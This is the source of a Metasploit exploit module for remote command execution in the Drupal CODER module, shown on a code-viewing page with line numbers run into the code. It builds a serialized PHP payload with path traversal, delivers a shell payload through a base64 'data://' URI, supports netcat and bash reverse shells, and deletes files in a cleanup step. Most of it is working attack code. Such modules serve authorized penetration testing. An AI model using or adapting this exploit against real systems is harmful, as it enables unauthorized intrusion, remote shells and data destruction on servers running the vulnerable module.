Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/drupal_coder_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info={})11super(update_info(info,12'Name' => 'Drupal CODER Module Remote Command Execution',13'Description' => %q{14This module exploits a Remote Command Execution vulnerability in the15Drupal CODER Module. Unauthenticated users can execute arbitrary16commands under the context of the web server user.1718The CODER module doesn't sufficiently validate user inputs in a script19file that has the PHP extension. A malicious unauthenticated user can20make requests directly to this file to execute arbitrary commands.21The module does not need to be enabled for this to be exploited.2223This module was tested against CODER 2.5 with Drupal 7.5 installed on24Ubuntu Server.25},26'License' => MSF_LICENSE,27'Author' =>28[29'Nicky Bloor <[email protected]>', # discovery30'Mehmet Ince <[email protected]>' # msf module31],32'References' =>33[34['URL', 'https://www.drupal.org/node/2765575']35],36'Privileged' => false,37'Payload' =>38{39'Space' => 250,40'DisableNops' => true,41'BadChars' => "\x2f",42'Compat' =>43{44'PayloadType' => 'cmd cmd_bash',45'RequiredCmd' => 'generic netcat netcat-e bash-tcp'46},47},48'Platform' => ['unix'],49'Arch' => ARCH_CMD,50'Targets' => [ ['Automatic', {}] ],51'DisclosureDate' => '2016-07-13',52'DefaultTarget' => 053))5455register_options(56[57OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])58]59)6061self.needs_cleanup = true62end6364def check65res = send_request_cgi(66'method' => 'GET',67'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),68)6970if res && res.body.include?('file parameter is not setNo path to parameter file')71Exploit::CheckCode::Appears72else73Exploit::CheckCode::Safe74end75end7677def exploit78p = ''79p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'80p << 's:11:"theme_cache";s:16:"theme_cache_test";'81p << 's:9:"variables";s:14:"variables_test";'82p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'83p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'84p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'85p << 's:7:"new_dir";s:'86p << (payload.encoded.length + 5).to_s87p << ':"-v;'88p << payload.encoded89p << ' #";s:4:"name";s:4:"test";}}}'9091pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"9293send_request_cgi(94'method' => 'GET',95'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),96'encode_params' => false,97'vars_get' => {98'file' => pl99}100)101end102103# XXX: FileDropper can't handle weird filenames104def on_new_session(session)105# This find command should be decently portable...106command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'107print_status("Cleaning up: #{command}")108session.shell_command_token(command)109end110end111112113